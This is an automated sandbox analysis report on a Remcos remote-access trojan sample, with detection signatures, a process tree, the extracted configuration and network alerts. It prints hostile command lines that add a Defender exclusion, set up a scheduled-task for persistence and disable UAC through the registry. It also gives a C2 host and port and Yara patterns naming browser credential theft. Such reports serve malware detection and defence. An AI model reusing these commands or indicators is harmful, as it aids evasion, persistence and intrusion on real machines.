Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vQyKfYxzXB.exe

Overview

General Information

Sample name:vQyKfYxzXB.exe
renamed because original name is a hash value
Original sample name:0d0cc505a458e4983da79246c321dfda6edc4d9b1f14e902ac13788a27c53afa.exe
Analysis ID:1587729
MD5:a5e057f72b814ddcc71246b8dd092e2a
SHA1:155810faddf2f068fe49735bbd6a3a13a60c75c3
SHA256:0d0cc505a458e4983da79246c321dfda6edc4d9b1f14e902ac13788a27c53afa
Tags:exeRemcosRATuser-adrian__luca
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • vQyKfYxzXB.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\vQyKfYxzXB.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
    • powershell.exe (PID: 7776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8088 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7800 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vQyKfYxzXB.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\vQyKfYxzXB.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
    • vQyKfYxzXB.exe (PID: 7908 cmdline: "C:\Users\user\Desktop\vQyKfYxzXB.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
    • vQyKfYxzXB.exe (PID: 7932 cmdline: "C:\Users\user\Desktop\vQyKfYxzXB.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
  • RTdozXra.exe (PID: 8036 cmdline: C:\Users\user\AppData\Roaming\RTdozXra.exe MD5: A5E057F72B814DDCC71246B8DD092E2A)
    • schtasks.exe (PID: 5296 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RTdozXra.exe (PID: 2140 cmdline: "C:\Users\user\AppData\Roaming\RTdozXra.exe" MD5: A5E057F72B814DDCC71246B8DD092E2A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["decmainserver.webredirect.org:45682:1"], "Assigned name": "hdyebf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "46875-RPQWNM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
    • 0x344e8:$a1: Remcos restarted by watchdog!
    • 0x34a40:$a3: %02i:%02i:%02i:%03i
    • 0x34dc5:$a4: * Remcos v
    0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.vQyKfYxzXB.exe.43e7e20.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0.2.vQyKfYxzXB.exe.43e7e20.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x661e0:$a1: Remcos restarted by watchdog!
            • 0x66738:$a3: %02i:%02i:%02i:%03i
            • 0x66abd:$a4: * Remcos v
            0.2.vQyKfYxzXB.exe.43e7e20.3.unpackREMCOS_RAT_variantsunknownunknown
            • 0x611e4:$str_a1: C:\Windows\System32\cmd.exe
            • 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6020c:$str_b2: Executing file:
            • 0x61328:$str_b3: GetDirectListeningPort
            • 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x60e30:$str_b7: \update.vbs
            • 0x60234:$str_b9: Downloaded file:
            • 0x60220:$str_b10: Downloading file:
            • 0x602c4:$str_b12: Failed to upload file:
            • 0x612f0:$str_b13: StartForward
            • 0x61310:$str_b14: StopForward
            • 0x60dd8:$str_b15: fso.DeleteFile "
            • 0x60d6c:$str_b16: On Error Resume Next
            • 0x60e08:$str_b17: fso.DeleteFolder "
            • 0x602b4:$str_b18: Uploaded file:
            • 0x60274:$str_b19: Unable to delete:
            • 0x60da0:$str_b20: while fso.FileExists("
            • 0x60749:$str_c0: [Firefox StoredLogins not found]
            0.2.vQyKfYxzXB.exe.43e7e20.3.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
            • 0x60100:$s1: \Classes\mscfile\shell\open\command
            • 0x60160:$s1: \Classes\mscfile\shell\open\command
            • 0x60148:$s2: eventvwr.exe
            0.2.vQyKfYxzXB.exe.455aa60.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 20 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", ProcessId: 7776, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", ProcessId: 7776, ProcessName: powershell.exe
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RTdozXra.exe, ParentImage: C:\Users\user\AppData\Roaming\RTdozXra.exe, ParentProcessId: 8036, ParentProcessName: RTdozXra.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp", ProcessId: 5296, ProcessName: schtasks.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", ProcessId: 7800, ProcessName: schtasks.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe", ProcessId: 7776, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\vQyKfYxzXB.exe", ParentImage: C:\Users\user\Desktop\vQyKfYxzXB.exe, ParentProcessId: 7548, ParentProcessName: vQyKfYxzXB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp", ProcessId: 7800, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T17:30:30.199994+010020365941Malware Command and Control Activity Detected192.168.2.74970269.174.98.4845682TCP
              2025-01-10T17:30:52.640096+010020365941Malware Command and Control Activity Detected192.168.2.74982069.174.98.4845682TCP
              2025-01-10T17:31:15.030732+010020365941Malware Command and Control Activity Detected192.168.2.74995569.174.98.4845682TCP
              2025-01-10T17:31:37.422868+010020365941Malware Command and Control Activity Detected192.168.2.74997869.174.98.4845682TCP
              2025-01-10T17:31:59.830523+010020365941Malware Command and Control Activity Detected192.168.2.74997969.174.98.4845682TCP
              2025-01-10T17:32:22.205879+010020365941Malware Command and Control Activity Detected192.168.2.74998069.174.98.4845682TCP
              2025-01-10T17:32:44.862851+010020365941Malware Command and Control Activity Detected192.168.2.74998169.174.98.4845682TCP
              2025-01-10T17:33:07.360992+010020365941Malware Command and Control Activity Detected192.168.2.74998269.174.98.4845682TCP
              2025-01-10T17:33:29.740356+010020365941Malware Command and Control Activity Detected192.168.2.74998369.174.98.4845682TCP
              2025-01-10T17:33:52.157024+010020365941Malware Command and Control Activity Detected192.168.2.74998469.174.98.4845682TCP
              2025-01-10T17:34:14.597081+010020365941Malware Command and Control Activity Detected192.168.2.74998569.174.98.4845682TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: vQyKfYxzXB.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeAvira: detection malicious, Label: HEUR/AGEN.1306877
              Found malware configuration
              Source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["decmainserver.webredirect.org:45682:1"], "Assigned name": "hdyebf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "46875-RPQWNM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeReversingLabs: Detection: 71%
              Multi AV Scanner detection for submitted file
              Source: vQyKfYxzXB.exeReversingLabs: Detection: 71%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.44a1440.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.43e7e20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7548, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vQyKfYxzXB.exe PID: 7932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTdozXra.exe PID: 2140, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: vQyKfYxzXB.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_004315EC
              Source: vQyKfYxzXB.exe, 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a7466245-f
              Source: vQyKfYxzXB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: vQyKfYxzXB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: Zfva.pdbSHA256 source: vQyKfYxzXB.exe, RTdozXra.exe.0.dr
              Source: Binary string: Zfva.pdb source: vQyKfYxzXB.exe, RTdozXra.exe.0.dr
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041A01B
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040B28E
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040838E
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004087A0
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00407848
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_004068CD FindFirstFileW,FindNextFileW,15_2_004068CD
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0044BA59 FindFirstFileExA,15_2_0044BA59
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040AA71
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00417AAB
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040AC78
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00406D28

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49702 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49820 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49979 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49982 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49981 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49984 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49978 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49983 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49985 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49955 -> 69.174.98.48:45682
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49980 -> 69.174.98.48:45682
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: decmainserver.webredirect.org
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 69.174.98.48 ports 2,4,5,6,8,45682
              Source: global trafficTCP traffic: 192.168.2.7:49702 -> 69.174.98.48:45682
              Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,15_2_0041936B
              Source: global trafficDNS traffic detected: DNS query: decmainserver.webredirect.org
              Source: RTdozXra.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: vQyKfYxzXB.exe, 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, vQyKfYxzXB.exe, 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, RTdozXra.exe, 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: vQyKfYxzXB.exe, 00000000.00000002.1314848353.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, RTdozXra.exe, 0000000B.00000002.1379421623.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000015_2_00409340
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040A65A
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_00414EC1
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040A65A
              Source: C:\Users\user\AppData\Roaming\RTdozXra.exeCode function: 15_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,15_2_00409468

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.43e7e20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.455aa60.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RTdozXra.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RTdozXra.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.vQyKfYxzXB.exe.455aa60.2.raw.unpack, type: UNPACKEDPE
